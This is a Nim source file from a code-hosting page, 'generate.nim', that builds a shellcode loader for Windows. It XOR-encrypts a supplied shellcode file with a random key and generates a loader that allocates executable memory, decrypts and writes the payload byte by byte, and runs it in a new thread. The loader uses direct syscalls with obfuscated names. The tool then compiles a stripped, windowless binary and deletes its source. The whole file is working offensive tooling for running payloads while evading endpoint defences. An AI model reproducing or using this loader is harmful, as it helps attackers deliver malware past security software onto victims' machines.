-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathgenerate.nim
97 lines (88 loc) · 2.61 KB
/
generate.nim
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
import os, strformat, strutils, lib/sysrandom
proc mainCode(shellcode: string, key: string): string =
let nimcall = "{.nimcall.}"
result = &"""
include "lib/syscalls.nim"
var shellcode = {shellcode}
let key = {key}
proc run(buffer: pointer): DWORD =
var function: proc ()
function = cast[(proc(): void {nimcall})](buffer)
function()
proc main() =
let processID: DWORD = GetCurrentProcessId()
var client_id: CLIENT_ID
var obj_attr: OBJECT_ATTRIBUTES
var process: HANDLE
var tHandle: HANDLE
var base_addr: LPVOID
var psize: SIZE_T = cast[SIZE_T](shellcode.len)
echo $processID
client_id.UniqueProcess = cast[HANDLE](processID)
#NtOpenProcess
var status = RxkzcQmUAYLRVNPU(
&process,
PROCESS_ALL_ACCESS,
&obj_attr, &client_id
)
#NtAllocateVirtualMemory
status = jXqvrXZAnszpxgAQ(
process, &base_addr, 0, &psize,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE)
var n: cint = 0
#NtWriteVirtualMemory
for i in 0..shellcode.len - 1:
for k in 0..key.len - 1:
shellcode[i] = shellcode[i] xor key[k]
status = KgnsbNKJvLjCzCdw(
process,
cast[LPVOID](cast[ULONG_PTR](base_addr) + n),
unsafeAddr shellcode[i],
0x1,
NULL)
n += 1;
Sleep(10000)
#NtCreateThreadEx
status = RgsaByzRzNoIffDM(
&tHandle,
THREAD_ALL_ACCESS,
NULL,
process,
run,
base_addr, FALSE, 0, 0, 0, NULL)
WaitForSingleObject(tHandle, -1)
#NtClose
status = qTBdyplOmaCsBBJV(tHandle)
status = qTBdyplOmaCsBBJV(process)
main()
"""
proc main() =
defer: closeRandom()
if(paramCount() != 2):
echo fmt"[!] Usage: {paramStr(0)} -f shellcode.bin"
var key = getRandomBytes(5)
var file = open(paramStr(2), FileMode.fmRead)
var mfile = open("main.nim", fmWrite)
defer: file.close
const BufSize = 1024
var shellcode: array[BufSize, byte]
var done = false
var output: string = "[byte "
var fmtkey: string = fmt"[byte {key[0]}, {key[1]}, {key[2]}, {key[3]}, {key[4]}]"
while not done:
let count = readBuffer(file, addr shellcode[0], BufSize)
for i in 0..count - 1:
for k in 0..key.len - 1:
shellcode[i] = shellcode[i] xor key[k]
if i == count - 1:
output = output & $shellcode[i]
else:
output = output & $shellcode[i] & ","
done = count == 0
output = output & "]"
mfile.write mainCode(output, fmtkey)
mfile.close
discard execShellCmd("nim c -d:mingw --cpu:amd64 --passL:-s --app:gui --gc:arc main.nim")
removeFile("main.nim")
main()